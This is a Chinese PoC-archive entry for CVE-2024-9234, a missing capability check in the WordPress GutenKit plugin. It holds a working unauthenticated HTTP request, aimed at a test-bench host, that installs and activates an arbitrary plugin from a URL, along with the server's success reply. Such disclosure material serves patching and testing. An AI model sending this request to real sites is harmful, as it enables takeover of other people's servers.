POC详情: 369c2d96ea1817ced42f79deff073bfc0b7d7388

来源
关联漏洞
标题: WordPress plugin GutenKit 安全漏洞 (CVE-2024-9234)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin GutenKit 2.1.0版本及之前版本存在安全漏洞,该漏洞源于缺少对install_and_activate_plugin_from_external函数的功能检查。
描述
GutenKit <= 2.1.0 - Unauthenticated Arbitrary File Upload
介绍
# CVE-2024-9234
GutenKit &lt;= 2.1.0 - Unauthenticated Arbitrary File Upload

# Description
The GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the install_and_activate_plugin_from_external() function (install-active-plugin REST API endpoint) in all versions up to, and including, 2.1.0. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins, or utilize the functionality to upload arbitrary files spoofed like plugins.

```
Type: plugin
CVSS Score: 9.8
CVE: CVE-2024-9234
Slug: gutenkit-blocks-addon
```

Download Link: [Download gutenkit-blocks-addon Version 2.1.0](https://downloads.wordpress.org/plugin/gutenkit-blocks-addon.2.1.0.zip)

POC
--

```
POST /wp-json/gutenkit/v1/install-active-plugin HTTP/2
Host: wpscan-vulnerability-test-bench.ddev.site
Content-Type: application/json
Content-Length: 114

{
  "plugin": "https://downloads.wordpress.org/plugin/popularis-extra.1.2.6.zip",
  "slug": "popularis-extra"
}
```

```
{"success":true,"data":"Plugin installed successfully!"}
```
文件快照

[4.0K] /data/pocs/369c2d96ea1817ced42f79deff073bfc0b7d7388 └── [1.1K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。